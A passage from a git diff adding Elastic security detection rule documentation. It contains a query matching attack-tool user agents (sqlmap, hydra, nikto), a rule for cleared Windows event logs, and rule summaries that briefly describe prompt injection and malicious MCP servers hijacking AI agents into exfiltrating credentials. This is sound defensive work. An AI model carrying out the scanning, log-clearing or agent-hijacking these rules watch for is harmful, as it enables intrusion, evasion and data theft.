analysis* + + +- Legitimate, scheduled vulnerability assessments by internal teams (e.g., Nessus, Nikto, or OpenVAS) can generate large volumes of requests with those user-agent strings across many paths. +- Developer or QA testing using discovery/fuzzing or intercept-proxy tools (Dirsearch, Gobuster, Ffuf, Burp, or OWASP ZAP) may unintentionally target production hosts, producing a short-lived spike with diverse URLs. + + +*Response and remediation* + + +- Immediately contain by blocking or rate-limiting the originating IPs at the WAF/CDN and edge firewall, and add temporary rules to drop or challenge requests that advertise tool user agents such as "nikto", "sqlmap", "dirsearch", "wpscan", "gobuster", or "burp". +- If traffic is proxied (CDN/reverse proxy), identify the true client via forwarded headers and extend blocks at both layers, enabling bot management or JS challenges on swept paths like /admin, /.git, /.env, /backup, and common discovery endpoints. +- Eradicate exposure by removing or restricting access to sensitive files and directories uncovered by the scans, rotating any credentials or API keys found, invalidating active sessions, and disabling public access to administrative panels until hardened. +- Recover by verifying no unauthorized changes or data exfiltration occurred, tuning per-IP and per-path rate limits to prevent path-sweeps while preserving legitimate traffic, and reintroducing normal rules only after fixes are deployed and stability is confirmed. +- Escalate to incident response if sensitive files are successfully downloaded (HTTP 200/206 on /.git, /.env, or backups), any login or account creation succeeds, multiple hosts or environments are targeted, or activity persists after blocking via UA spoofing or rapid IP rotation. +- Harden long term by enforcing WAF signatures for known scanner UAs and path patterns, denying directory listing and direct access to /.git, /.env, /backup and similar artifacts, requiring MFA/VPN for /admin and management APIs, and deploying auto-ban controls like fail2ban or mod_security. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*, logs-traefik.access-* + +| eval Esql.user_agent_original_to_lower = to_lower(user_agent.original), Esql.url_original_to_lower = to_lower(url.original) + +| where + Esql.user_agent_original_to_lower like "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/74.0.3729.169 safari/537.36" or // Nikto + Esql.user_agent_original_to_lower like "nikto*" or // Nikto + Esql.user_agent_original_to_lower like "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)" or // Nessus Vulnerability Scanner + Esql.user_agent_original_to_lower like "*nessus*" or // Nessus Vulnerability Scanner + Esql.user_agent_original_to_lower like "sqlmap/*" or // SQLMap + Esql.user_agent_original_to_lower like "wpscan*" or // WPScan + Esql.user_agent_original_to_lower like "feroxbuster/*" or // Feroxbuster + Esql.user_agent_original_to_lower like "masscan*" or // Masscan & masscan-ng + Esql.user_agent_original_to_lower like "fuzz*" or // Ffuf + Esql.user_agent_original_to_lower like "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/user_agent.original like~ 87.0.4280.88 safari/537.36" or // Dirsearch + Esql.user_agent_original_to_lower like "mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)" or // Dirb + Esql.user_agent_original_to_lower like "dirbuster*" or // Dirbuster + Esql.user_agent_original_to_lower like "gobuster/*" or // Gobuster + Esql.user_agent_original_to_lower like "*dirsearch*" or // dirsearch + Esql.user_agent_original_to_lower like "*nmap*" or // Nmap Scripting Engine + Esql.user_agent_original_to_lower like "*hydra*" or // Hydra Brute Forcer + Esql.user_agent_original_to_lower like "*w3af*" or // w3af Web Application Attack and Audit Framework + Esql.user_agent_original_to_lower like "*arachni*" or // Arachni Web Application Security Scanner + Esql.user_agent_original_to_lower like "*skipfish*" or // Skipfish Web Application Security Scanner + Esql.user_agent_original_to_lower like "*openvas*" or // OpenVAS Vulnerability Scanner + Esql.user_agent_original_to_lower like "*acunetix*" or // Acunetix Vulnerability Scanner + Esql.user_agent_original_to_lower like "*zap*" or // OWASP ZAP + Esql.user_agent_original_to_lower like "*burp*" // Burp Suite + +| keep + @timestamp, + event.dataset, + user_agent.original, + source.ip, + agent.id, + agent.name, + Esql.url_original_to_lower, + Esql.user_agent_original_to_lower, + data_stream.namespace +| stats + Esql.event_count = count(), + Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.url_original_values = values(Esql.url_original_to_lower), + Esql.user_agent_original_values = values(Esql.user_agent_original_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by source.ip, agent.id +| where + Esql.event_count > 50 and Esql.url_original_count_distinct > 10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Scanning IP Blocks +** ID: T1595.001 +** Reference URL: https://attack.mitre.org/techniques/T1595/001/ +* Sub-technique: +** Name: Vulnerability Scanning +** ID: T1595.002 +** Reference URL: https://attack.mitre.org/techniques/T1595/002/ +* Sub-technique: +** Name: Wordlist Scanning +** ID: T1595.003 +** Reference URL: https://attack.mitre.org/techniques/T1595/003/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc new file mode 100644 index 0000000000..49105da920 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-19-18-windows-event-logs-cleared]] +=== Windows Event Logs Cleared + +Identifies attempts to clear Windows event log stores. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.security* +* logs-system.system* +* logs-windows.forwarded* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Windows Security Event Logs +* Data Source: Windows System Event Logs + +*Version*: 216 + +*Rule authors*: + +* Elastic +* Anabella Cristaldi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Windows Event Logs Cleared* + + +Windows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response. + +This rule looks for the occurrence of clear actions on the `security` event log. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. + - Verify if any other anti-forensics behaviors were observed. +- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up. + + +*False positive analysis* + + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. + - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:windows and event.action:("audit-log-cleared" or "Log clear") and + winlog.channel: ("Security" or "System") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Windows Event Logs +** ID: T1070.001 +** Reference URL: https://attack.mitre.org/techniques/T1070/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-appendix.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-appendix.asciidoc new file mode 100644 index 0000000000..b6a4f8ceef --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-appendix.asciidoc @@ -0,0 +1,75 @@ +["appendix",role="exclude",id="prebuilt-rule-8-19-18-prebuilt-rules-8-19-18-appendix"] += Downloadable rule update v8.19.18 + +This section lists all updates associated with version 8.19.18 of the Fleet integration *Prebuilt Security Detection Rules*. + + +include::prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc[] +include::prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc[] +include::prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc[] +include::prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc[] +include::prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc[] +include::prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc[] +include::prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc[] +include::prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc[] +include::prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc[] +include::prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc[] +include::prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc[] +include::prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc[] +include::prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc[] +include::prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc[] +include::prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc[] +include::prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc[] +include::prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc[] +include::prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc[] +include::prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc[] +include::prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc[] +include::prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc[] +include::prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc[] +include::prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc[] +include::prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc[] +include::prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc[] +include::prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc[] +include::prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc[] +include::prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc[] +include::prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc[] +include::prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc[] +include::prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc[] +include::prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc[] +include::prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc[] +include::prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc[] +include::prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc[] +include::prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc[] +include::prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc[] +include::prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc[] +include::prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc[] +include::prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc[] +include::prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc[] +include::prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc[] +include::prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc[] +include::prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc[] +include::prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc[] +include::prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc[] +include::prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc[] +include::prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc[] +include::prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc[] +include::prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc[] +include::prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc[] +include::prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc[] +include::prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc[] +include::prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc[] +include::prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc[] +include::prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc[] +include::prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc[] +include::prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc[] +include::prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc[] +include::prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc[] +include::prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc[] +include::prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc[] +include::prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc[] +include::prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc[] +include::prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc[] +include::prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc[] +include::prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc[] +include::prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc[] +include::prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc[] diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc new file mode 100644 index 0000000000..f7b14d8584 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-18-prebuilt-rules-8-19-18-summary]] +[role="xpack"] +== Update v8.19.18 + +This section lists all updates associated with version 8.19.18 of the Fleet integration *Prebuilt Security Detection Rules*. + + +[width="100%",options="header"] +|============================================== +|Rule |Description |Status |Version + +|<> | Identifies the creation of a new AWS CloudShell environment. CloudShell is a browser-based shell that provides command-line access to AWS resources directly from the AWS Management Console. The CreateEnvironment API is called when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region. Adversaries with console access may use CloudShell to execute commands, install tools, or interact with AWS services without needing local CLI credentials. Monitoring environment creation helps detect unauthorized CloudShell usage from compromised console sessions. | new | 1 + +|<> | Identifies AWS API activity originating from uncommon desktop client applications based on the user agent string. This rule detects S3 Browser and Cyberduck, which are graphical S3 management tools that provide bulk upload/download capabilities. While legitimate, these tools are rarely used in enterprise environments and have been observed in use by threat actors for data exfiltration. Any activity from these clients should be validated against authorized data transfer workflows. | new | 1 + +|<> | Detects when a service principal authenticates to Microsoft Entra ID and then lists credentials for an Azure Arc-connected Kubernetes cluster within a short time window. The `listClusterUserCredential` action retrieves tokens that enable kubectl access through the Arc Cluster Connect proxy. This sequence (service principal sign-in followed by Arc credential retrieval), represents the exact attack chain used by adversaries with stolen service principal secrets to establish a proxy tunnel into Kubernetes clusters. Service principals that authenticate externally (as opposed to managed identities) and immediately access Arc cluster credentials warrant investigation, particularly when the sign-in originates from an unexpected location or ASN. | new | 1 + +|<> | Detects when a service principal or user performs an Azure Arc cluster credential listing operation from a source IP not previously associated with that identity. The `listClusterUserCredential` action retrieves credentials for the Arc Cluster Connect proxy, enabling kubectl access through the Azure ARM API. An adversary using stolen service principal credentials will typically call this operation from infrastructure not previously seen for that SP. By tracking the combination of caller identity and source IP, this rule avoids false positives from backend services and CI/CD pipelines that rotate IPs but maintain consistent identity-to-IP patterns over time. | new | 1 + +|<> | Detects when an Azure service principal authenticates from multiple countries within a short time window, which may indicate stolen credentials being used from different geographic locations. Service principals typically authenticate from consistent locations tied to their deployment infrastructure. Authentication from multiple countries in a brief period suggests credential compromise, particularly when the source countries do not align with the organization's expected operating regions. This pattern has been observed in attacks using stolen CI/CD credentials, phished service principal secrets, and compromised automation accounts. | new | 1 + +|<> | Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs. | new | 1 + +|<> | Identifies when a SharePoint or OneDrive site sharing policy is changed to weaken security controls. The SharingPolicyChanged event fires for many routine policy modifications, but this rule targets specific high-risk transitions where sharing restrictions are relaxed. This includes enabling guest sharing, enabling anonymous link sharing, making a site public, or enabling guest user access. Adversaries who compromise administrative accounts may weaken sharing policies to exfiltrate data to external accounts or create persistent external access paths. | new | 1 + +|<> | Identifies when a new SharePoint Site Administrator is added in Microsoft 365. Site Administrators have full control over SharePoint Sites, including the ability to manage permissions, access all content, and modify site settings. Adversaries who compromise a privileged account may add themselves or a controlled account as a Site Administrator to maintain persistent, high-privilege access to sensitive SharePoint data. This technique was notably observed in the 0mega ransomware campaign, where attackers elevated privileges to exfiltrate data and deploy ransom notes across SharePoint sites. | new | 1 + +|<> | Detects processes attempting to write to AppArmor policy management pseudo-files located under "/sys/kernel/security/apparmor/". These special kernel interfaces are used to load, replace, or remove AppArmor profiles (".load", ".replace", ".remove"). In normal environments, AppArmor policy management is typically performed by administrative tools such as "apparmor_parser" during system initialization or package installation. Direct interaction with these pseudo-files from shell utilities, interpreters, or scripting environments is uncommon and may indicate attempts to modify security policy at runtime. Adversaries may abuse these interfaces to weaken or disable AppArmor protections, introduce malicious profiles, or exploit vulnerabilities in the AppArmor policy parser as part of local privilege escalation chains. | new | 1 + +|<> | Identifies access to AppArmor kernel policy control interfaces through the .load, .replace, or .remove files under /sys/kernel/security/apparmor/. These special files are used to load, modify, or remove AppArmor profiles and are rarely accessed during normal system activity outside of policy administration. Reads or writes to these interfaces may indicate legitimate security configuration changes, but can also reflect defense evasion, unauthorized policy tampering, or the installation of attacker-controlled profiles. This detection is especially valuable on systems where AppArmor policy changes are uncommon or tightly controlled. | new | 1 + +|<> | Identifies events where the AppArmor security module blocked or restricted an operation due to a policy violation. AppArmor enforces mandatory access control policies that limit how processes interact with system resources such as files, network sockets, and capabilities. When a process attempts an action that is not permitted by the active profile, the kernel generates a policy violation event. While these events can occur during normal operation or misconfiguration, they may also indicate attempted privilege escalation, restricted file access, or malicious activity being prevented by the system's security policy. | new | 1 + +|<> | Detects the execution of "apparmor_parser" using the "-o" option to write a compiled AppArmor profile to an output file. This functionality is normally used by system administration tools or package installation scripts when building or loading AppArmor policies. In adversarial scenarios, attackers may use "apparmor_parser" to compile custom AppArmor profiles that can later be loaded into the kernel through AppArmor policy management interfaces. Malicious profiles may weaken security controls, alter the behavior of privileged programs, or assist in exploitation chains involving AppArmor policy manipulation. | new | 1 + +|<> | This rule detects the use of database dumping utilities to exfiltrate data from a database. Attackers may attempt to dump the database to a file on the system and then exfiltrate the file to a remote server. | new | 1 + +|<> | This rule detects non-root file creation within "/tmp/.snap" or its host backing path "/tmp/snap-private-tmp/*/tmp/.snap", which may indicate exploitation attempts related to CVE-2026-3888. In vulnerable Ubuntu systems, the snap-confine utility normally creates the "/tmp/.snap" directory as root when initializing a snap sandbox. The vulnerability arises when systemd-tmpfiles deletes this directory after it becomes stale, allowing an unprivileged user to recreate it and populate attacker-controlled files. During subsequent snap sandbox initialization, snap-confine may bind-mount or trust these attacker-controlled paths, enabling manipulation of libraries or configuration files that can lead to local privilege escalation to root. Because legitimate creation of ".snap" directories should only be performed by root, non-root file activity in these locations is highly suspicious. This detection helps identify early stages of the exploit before privilege escalation is completed. | new | 1 + +|<> | Detects the first time a Python process accesses sensitive credential files on a given host. This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise. | new | 1 + +|<> | Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise. | new | 1 + +|<> | Detects the first time a Python process creates or modifies a LaunchAgent or LaunchDaemon plist file on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can establish persistence on macOS by writing plist files to LaunchAgent or LaunchDaemon directories. Legitimate Python processes do not typically create persistence mechanisms, so a first occurrence is a strong indicator of compromise. | new | 1 + +|<> | Generates a detection alert for each IBM QRadar offense written to the configured indices. Enabling this rule allows you to immediately begin investigating IBM QRadar offense alerts in the app. | new | 1 + +|<> | Identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window. Legitimate MSP environments may run multiple tools, but this pattern can also indicate compromise, shadow IT, or attacker staging of redundant access. Processes are mapped to a single vendor label so multiple binaries from the same vendor do not inflate the count. | new | 1 + +|<> | Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect. This behavior may indicate abuse where an attacker triggers an MSI install then connects via a guest link with a known session key. | new | 1 + +|<> | Identifies the use of Cloudflare Tunnel (cloudflared) to expose a local service or create an outbound tunnel. Adversaries may abuse quick tunnels (e.g. tunnel --url http://127.0.0.1:80) or named tunnels to proxy C2 traffic or exfiltrate data through Cloudflare's edge while evading direct connection blocking. | new | 1 + +|<> | Identifies execution of Yuze, a lightweight open-source tunneling tool used for intranet penetration. Yuze supports forward and reverse SOCKS5 proxy tunneling and is typically executed via rundll32 loading yuze.dll with the RunYuze export. Threat actors may use it to proxy C2 or pivot traffic. | new | 1 + +|<> | Detects shell executions (cmd, PowerShell, rundll32) spawned by Velociraptor. Threat actors have been observed installing Velociraptor to execute shell commands on compromised systems, blending in with legitimate system processes. | new | 1 + +|<> | Detects execution of JavaScript via Deno with suspicious command-line patterns (base64, eval, http, or import in a javascript context). Adversaries may abuse Deno to run malicious JavaScript for execution or staging. | new | 1 + +|<> | Identifies abuse of rclone (or a renamed copy, e.g. disguised as a security or backup utility) to exfiltrate data to cloud storage or remote endpoints. Rclone is a legitimate file sync tool; threat actors rename it to blend with administrative traffic and use copy/sync with cloud backends (e.g. :s3:) and include filters to exfiltrate specific file types. | new | 1 + +|<> | Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. | update | 4 + +|<> | Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented. | update | 4 + +|<> | Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. | update | 113 + +|<> | Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. | update | 5 + +|<> | Detects unusual modification of GenAI tool configuration files. Adversaries may inject malicious MCP server configurations to hijack AI agents for persistence, C2, or data exfiltration. Attack vectors include malware or scripts directly poisoning config files, supply chain attacks via compromised dependencies, and prompt injection attacks that abuse the GenAI tool itself to modify its own configuration. Unauthorized MCP servers added to these configs execute arbitrary commands when the AI tool is next invoked. | update | 4 + +|<> | Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. | update | 2 + +|<> | Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions. | update | 2 + +|<> | Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents. | update | 2 + +|<> | This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise. | update | 4 + +|<> | Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior. | update | 2 + +|<> | This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early. | update | 4 + +|<> | This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks. | update | 4 + +|<> | This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited. | update | 4 + +|<> | This rule detects unusual spikes in web server requests with uncommon or suspicious user-agent strings. Such activity may indicate reconnaissance attempts by attackers trying to identify vulnerabilities in web applications or servers. These user-agents are often associated with automated tools used for scanning, vulnerability assessment, or brute-force attacks. | update | 4 + +|<> | Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days. | update | 4 + +|<> | Identifies when a user is observed for the first time authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. This rule only applies to Entra ID user types and detects new users leveraging this flow. | update | 8 + +|<> | This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. | update | 6 + +|<> | Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. | update | 213 + +|<> | Detects the use of curl to upload files to an internet server. Threat actors often will collect and exfiltrate data on a system 